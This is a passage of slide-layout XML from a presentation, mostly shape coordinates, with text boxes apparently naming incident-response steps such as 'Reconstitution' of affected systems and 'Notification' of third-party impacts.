                    <a:pt x="57245" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296672" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3527044" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3575161" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3620808" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3663374" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3702247" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3736816" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3766470" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790598" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3808589" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819832" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3823716" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3823716" y="296672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819832" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3808589" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790598" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3766470" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3736816" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3702247" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3663374" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3620808" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3575161" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3527044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789938" y="4621529"/>
              <a:ext cx="3823970" cy="1780539"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3823970" h="1780539">
                  <a:moveTo>
                    <a:pt x="0" y="296672"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3883" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296672" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3527044" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3575161" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3620808" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3663374" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3702247" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3736816" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3766470" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790598" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3808589" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819832" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3823716" y="296672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3823716" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819832" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3808589" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790598" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3766470" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3736816" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3702247" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3663374" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3620808" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3575161" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3527044" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296672" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3883" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="296672"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="04668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009901" y="5076596"/>
            <a:ext cx="3379470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64590" marR="5080" indent="-1152525">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Reconstitution</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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404040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3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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>affected </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>systems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998961" y="4669790"/>
            <a:ext cx="3849370" cy="1805939"/>
            <a:chOff x="10998961" y="4669790"/>
            <a:chExt cx="3849370" cy="1805939"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11011661" y="4682490"/>
              <a:ext cx="3823970" cy="1780539"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3823969" h="1780539">
                  <a:moveTo>
                    <a:pt x="3527044" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="296672" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3883" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="296672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3883" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296672" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3527044" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3575161" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3620808" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3663374" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3702247" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3736816" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3766470" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790598" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3808589" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819832" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3823716" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3823716" y="296672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819832" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3808589" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790598" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3766470" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3736816" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3702247" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3663374" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3620808" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3575161" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3527044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011661" y="4682490"/>
              <a:ext cx="3823970" cy="1780539"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3823969" h="1780539">
                  <a:moveTo>
                    <a:pt x="0" y="296672"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3883" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296672" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3527044" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3575161" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3620808" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3663374" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3702247" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3736816" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3766470" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790598" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3808589" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819832" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3823716" y="296672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3823716" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819832" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3808589" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790598" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3766470" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3736816" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3702247" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3663374" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3620808" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3575161" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3527044" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296672" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3883" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="296672"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25399">
              <a:solidFill>
                <a:srgbClr val="04668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11473433" y="5137175"/>
            <a:ext cx="2900045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62610" marR="5080" indent="-550545">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Notification</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="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404040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-1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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>third- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>party</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>impacts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449324" y="4329684"/>
            <a:ext cx="678180" cy="702945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="678180" h="702945">
                <a:moveTo>
                  <a:pt x="339089" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="293066" y="3205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248928" y="12544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207079" y="27598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167922" y="47949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131860" y="73179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99298" y="102869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70638" y="136603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46284" y="173961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26640" y="214526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12109" y="257880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3094" y="303604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="351281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3094" y="398959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12109" y="444683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26640" y="488037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46284" y="528602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70638" y="565960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99298" y="599693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131860" y="629384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167922" y="654614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207079" y="674965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248928" y="690019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293066" y="699358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339089" y="702563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385113" y="699358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429251" y="690019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471100" y="674965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510257" y="654614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546319" y="629384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="578881" y="599694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607541" y="565960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631895" y="528602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651539" y="488037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666070" y="444683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675085" y="398959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678180" y="351281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675085" y="303604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666070" y="257880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651539" y="214526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631895" y="173961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607541" y="136603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="578881" y="102869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546319" y="73179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510257" y="47949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471100" y="27598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429251" y="12544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385113" y="3205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339089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696973" y="4486402"/>
            <a:ext cx="1847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0" b="1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671047" y="4329684"/>
            <a:ext cx="678180" cy="702945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="678179" h="702945">
                <a:moveTo>
                  <a:pt x="339090" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="293066" y="3205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248928" y="12544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207079" y="27598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167922" y="47949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131860" y="73179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99298" y="102869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70638" y="136603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46284" y="173961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26640" y="214526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12109" y="257880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3094" y="303604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="351281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3094" y="398959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12109" y="444683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26640" y="488037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46284" y="528602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70638" y="565960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99298" y="599693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131860" y="629384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167922" y="654614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207079" y="674965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248928" y="690019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293066" y="699358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339090" y="702563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385113" y="699358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429251" y="690019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471100" y="674965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510257" y="654614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546319" y="629384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="578881" y="599694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607541" y="565960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631895" y="528602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651539" y="488037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666070" y="444683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675085" y="398959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678179" y="351281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675085" y="303604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666070" y="257880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651539" y="214526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631895" y="173961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607541" y="136603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="578881" y="102869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546319" y="73179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510257" y="47949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471100" y="27598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429251" y="12544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385113" y="3205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339090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0919586" y="4486402"/>
            <a:ext cx="1847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0" b="1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387338" y="4669790"/>
            <a:ext cx="4624070" cy="1805939"/>
            <a:chOff x="6387338" y="4669790"/>
            <a:chExt cx="4624070" cy="1805939"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10225278" y="5509006"/>
              <a:ext cx="786130" cy="127000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="786129" h="127000">
                  <a:moveTo>
                    <a:pt x="658749" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="658749" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760349" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671449" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671449" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760349" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658749" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="786129" h="127000">
                  <a:moveTo>
                    <a:pt x="658749" y="50800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658749" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658749" y="50800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="786129" h="127000">
                  <a:moveTo>
                    <a:pt x="760349" y="50800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="671449" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671449" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760349" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785749" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760349" y="5080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400038" y="4682490"/>
              <a:ext cx="3825240" cy="1780539"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3825240" h="1780539">
                  <a:moveTo>
                    <a:pt x="3528567" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="296671" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="202907"/>
